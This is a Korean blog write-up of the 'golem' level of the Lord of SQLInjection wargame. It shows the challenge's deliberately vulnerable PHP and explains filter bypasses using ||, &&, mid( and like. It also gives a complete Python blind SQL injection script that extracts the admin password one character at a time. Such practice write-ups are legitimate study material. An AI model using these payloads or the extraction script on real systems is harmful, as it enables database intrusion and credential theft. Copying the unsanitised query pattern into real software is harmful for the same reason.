wargame 🏴‍☠️ write-up/Lord of SQLInjection

golem

Kortsec1 2022. 4. 2. 17:54 
<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/or|and|substr\(|=/i', $_GET[pw])) exit("HeHe"); 
  $query = "select id from prob_golem where id='guest' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_golem where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem"); 
  highlight_file(__FILE__); 
?>

or, and, substr(, =를 추가적으로 필터링한다.

각각 ||, &&, mid(, like로 우회하면 간단히 풀린다.

 

해당 문제는 blind-sqli문제로 정확한 pw값을 찾아내야 한다.

 

2022.04.02 - [wargame write-up/Lord of SQLInjection] - orc

 

orc

<?php include "./config.php"; login_chk(); $db = dbconnect(); if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); $query = "select id from prob_orc where id='admin' and pw='{$_GET[pw..

kortsec1n4mationm.tistory.com

orc에서 만든 python code에서 or, and, substr(, =를 바꾸어 새로 작성해보자.

 

import requests

cookies = {'PHPSESSID' : 'asdfasdfasdfasdf'}

print("finding length of pw...")
for i in range(1,100):
    url = 'https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw=1\' || id like \'admin\' %26%26 length(pw) like ' + str(i) + '%23'
    res = requests.get(url, cookies=cookies)
    print(str(i) + " ... ", end="")
    if "Hello admin" in res.text:
        len_pw = i
        print("0")
        print("================================")
        print("len : " + str(i))
        print("================================")
        print("\n")
        break
    else:
        print("X")

full_pw = ""
print("finding full pw...")
for i in range(len_pw):
    for j in range(32, 127):
        url = 'https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw=1\' || id like \'admin\' %26%26 ascii(mid(pw,' + str(i+1) + ', 1)) like ' + str(j) + '%23'
        res = requests.get(url, cookies=cookies)
        if "Hello admin" in res.text:
            full_pw += chr(j)
            break;
    print("pw : " + full_pw)
print("================================")
print("pw : " + full_pw)
print("================================")

 

실행시킨뒤, 결과를 pw값으로 넘겨주면 끝

 

그림1 프로그램 실행

두구두구

그림2 성공